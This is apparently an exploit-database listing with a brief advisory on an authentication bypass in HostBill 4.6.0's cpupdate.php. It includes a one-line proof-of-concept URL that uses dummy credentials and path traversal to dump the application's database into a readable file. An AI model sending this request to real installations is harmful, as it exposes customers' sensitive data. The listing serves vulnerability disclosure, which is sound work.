HostBill - 'cpupdate.php' Authentication Bypass
| EKU-ID: 43010 | CVE: | OSVDB-ID: |
| Author: localhost.re | Published: 2013-05-29 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 43010 | CVE: | OSVDB-ID: |
| Author: localhost.re | Published: 2013-05-29 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
source: https://www.securityfocus.com/bid/60958/info HostBill is prone to an authentication-bypass vulnerability. Attackers can exploit this issue to gain unauthorized access to the affected application and disclose sensitive information. HostBill 4.6.0 is vulnerable; other versions may also be affected. www.example.com/includes/cpupdate.php?do=backup&filename=../templates_c/DB_Dump.txt&login_username=0&password=0